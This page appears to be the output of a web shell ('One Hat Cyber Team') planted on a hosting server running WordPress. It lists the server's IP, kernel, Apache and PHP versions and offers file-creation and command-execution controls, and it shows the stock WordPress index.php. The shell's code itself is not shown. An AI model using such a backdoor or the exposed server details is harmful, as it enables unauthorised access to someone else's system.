One Hat Cyber Team
Your IP :
18.222.23.166
Server IP :
160.153.138.178
Server :
Linux 96005569-11f4-b882-3aaf-90153394995a.secureserver.net 6.1.128-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Feb 1 15:04:00 EST 2025 x86_64
Server Software :
Apache
PHP Version :
8.0.30.5
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
View File Name :
index.php
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';